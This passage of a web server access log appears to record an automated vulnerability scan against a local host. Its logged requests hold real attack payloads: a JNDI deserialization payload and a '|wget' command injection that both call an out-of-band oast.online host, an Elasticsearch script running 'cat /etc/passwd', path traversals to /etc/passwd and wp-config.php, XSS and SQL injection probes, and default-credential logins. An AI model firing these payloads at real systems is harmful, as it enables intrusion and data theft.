"http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28q98smpvbk9ig07h0oq1noiousgyap.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboardUser HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://ca28q98smpvbk9ig07h06e5tzppmc1wxg.oast.online|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"cmd=login&user=admin&passwd=21232f297a57a5a743894a0e4a801fc3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 